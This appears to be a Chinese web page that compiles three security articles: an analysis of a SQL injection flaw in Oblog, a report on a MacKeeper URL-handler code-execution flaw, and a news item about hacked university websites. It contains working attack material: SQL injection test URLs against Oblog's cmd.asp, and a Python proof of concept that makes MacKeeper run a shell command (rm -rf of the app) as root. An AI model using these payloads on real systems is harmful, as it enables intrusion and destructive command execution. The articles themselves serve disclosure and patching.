一 : Oblog最新注入漏洞分析(已修补)

Date：2008-5-15 Author：Yamato[BCT] Version：Oblog 4.5-4.6 sql 代码分析： 文件In/Class_UserCommand.asp : strMonth=Request("month") //第63行 strDay=Request("day") …… Case "month" //第84行 Dim LastDay G_P_FileName = G_P_FileName & "month&month=" & strMonth strDay=Left(strMonth,4) & "-" & Right(strMonth,2) & "-01" mYear=Left(strMonth,4) mMonth=Right(strMonth,2) If InStr ("01,03,05,07,08,10,12",mMonth)> 0 Then LastDay = "31"…… Else //第109行 SqlPart = " And Addtime >=’"&strMonth&"01’ AND Addtime < ’"&strMonth&LastDay&"’ " 构造合适的变量strMonth进行注射 测试方法: http://localhost/oblog/cmd.asp?do= month&month=2008’ and user>0--01 strDay变量从month中获得日期数据，并判断strDay是否为日期数据。所以构造的注射语句为： http://localhost/oblog/cmd.asp?do= month&month=2008’(自己的sql语句)--01 执行sql语句采用rst.Open strSql,Conn,1,1 不能修改记录集.

二 : Mac下的360“MacKeeper”曝任意代码执行漏洞

相信Mac用户一定看过Mackeeper的广告——这是一款Mac OS系统优化软件，集杀毒、加密、数据备份、系统清理和软件卸载于一身，可以认为是Mac下的360。

5月7日，Mackeeper被发现存在严重的安全漏洞，在其处理URL的代码中存在远程代码执行漏洞，当用户访问被恶意构造的网页即可触发高危漏洞。

漏洞描述

安全研究人员Braden Thomas发现了此漏洞，当用户访问恶意构造的网站的时候，几乎不需要做什么交互，就可以以 最高系统权限Root 执行任意代码，他还公布了POC（漏洞验证程序）来演示用户用Safari访问恶意构造的网站的时候可以执行任意代码，在POC中执行的代码是卸载MacKeeper。漏洞的原因是MacKeeper使用自定义URL结构执行命令的时候没有对输入数据做安全检查。

如果MacKeeper在正常操作的时候已经提示用户输入密码，那么在以root权限执行任意代码的时候是不会提示用户输入密码的。如果用户之前没有通过认证，那么MacKeeper会提示用户输入账号密码，然而，漏洞利用正是这些用户输入的字符，所以用户可能会感觉到漏洞利用的过程。

苹果允许OSX及iOS平台上的app自定义URL的结构，这些URL可以注册系统事件，来掉起系统上的其他APP处理当前URL ，正常情况下，这种功能是用来自定义一些协议来执行指定操作(比如在iOS上点击一个电话号码的链接的时候，系统会询问用户是否要拨打电话，点击一个邮件地址的时候，系统会启动邮件APP) 苹果系统内置的APP在代码中明确告诉开发者需要对输入的自定义URL做安全检查，以防止在处理URL的时候出现异常。另外，苹果还在官方文档中指出对输入数据做安全检查的重要性。

影响范围

由于这个0day在最新的MacKeeper（MacKeeper 3.4）中也存在，所以很多用户都受影响，在之前的一个报道中显示，有2千万的用户都受影响。MacKeeper 在Mac社区中是一个受争议的应用，用户抱怨其频繁弹窗频繁推送广告。
如今该漏洞的POC已经公开，因此MacKeeper用户很容易到攻击。

POC：
import sys,base64
from Foundation import *
RUN_CMD = "rm -rf /Applications/MacKeeper.app;pkill -9 -a MacKeeper"
d = NSMutableData.data()
a = NSArchiver.alloc().initForWritingWithMutableData_(d)
a.encodeValueOfObjCType_at_("@",NSString.stringWithString_("NSTask"))
a.encodeValueOfObjCType_at_("@",NSDictionary.dictionaryWithObjectsAndKeys_(NSString.stringWithString_("/bin/sh"),"LAUNCH_PATH",NSArray.arrayWithObjects_(NSString.stringWithString_("-c"),NSString.stringWithString_(RUN_CMD),None),"ARGUMENTS",NSString.stringWithString_("Your computer has malware that needs to be removed."),"PROMPT",None))
print "com-zeobit-command:///i/ZBAppController/performActionWithHelperTask:arguments:/"+base64.b64encode(d)
https://twitter.com/drspringfield/status/596316000385167361

安全建议

MacKeeper用户应该立即更新到最新版本。默认情况下，MacKeeper会自动检查更新，当MacKeeper弹出升级提示的时候，点击ok就可以安装更新。

当然用户可以通过一些方式来避免攻击。在OS X上，点击Safari浏览器中的一个自定义链接，会调用系统中指定的应用程序来处理对应的URL，在其他浏览器中，比如chrome浏览器，会提示用户是否同意打开该自有协议的链接。
对于技术小白来说，尽量使用Safari以外的浏览器，这样，在执行任意代码之前，系统会弹出提示。技术大拿可以在MacKeeper的Info.plist文件中移除操作URL相关的代码。

扩展：任意代码执行漏洞 / 任意命令执行漏洞 / 任意文件下载漏洞

三 : 北师大网站“被黑”近半年 360称其应修补漏洞

日前有媒体报道称，北师大人事处网站被篡改到黄色网站，该校信息网络中心工作人员回应是“黑客入侵”。网上公开信息显示，早在今年4月，360安全中心已指出北师大等上百家高校网站被黑客嵌入色情关键词，其根源在于网站存在安全漏洞。专家认为，网站如果不及时修复漏洞，即便删掉相关链接，也可能被黑客反复入侵控制。

360安全专家表示，黑客之所以攻击北师大等知名高校网站，其目的是篡改这些网站的页面内容，使其指向带有木马的色情网站。经过高校网站作为“中转站”，这些色情网站既可以避免被搜索引擎封掉，又能间接吸引网民访问，趁机传播木马病毒。以今年4月肆虐的“黑桃J”木马为例，该木马曾利用上百所高校网站进行传播，每天攻击电脑数量达到20余万台。

据了解，安全漏洞正在成为国内网站面临的普遍威胁，并非只有北师大等高校网站容易被黑。360网站安全检测平台统计数据显示，目前国内平均每月有3899个网站被黑客篡改页面，存在漏洞等安全隐患的网站比例更是高达83%。

针对网站管理人员，360安全专家建议提高管理后台的密码强度，并及时修复网站漏洞，清理服务器上可能存在的黑客后门。缺乏专业安全维护人员的网站，可免费使用360网站安全检测服务，在360的协助下检测并修复漏洞。

360网站安全检测平台：http://webscan.360.cn

新闻背景

（媒体报道）黑客入侵北师大人事处网站 网址被篡改为黄色网站

360安全中心在今年4月发现北师大等多家高校网站被黑

?recommend=1

本文标题：360修补漏洞-Oblog最新注入漏洞分析(已修补)
本文地址： http://www.61k.com/1062400.html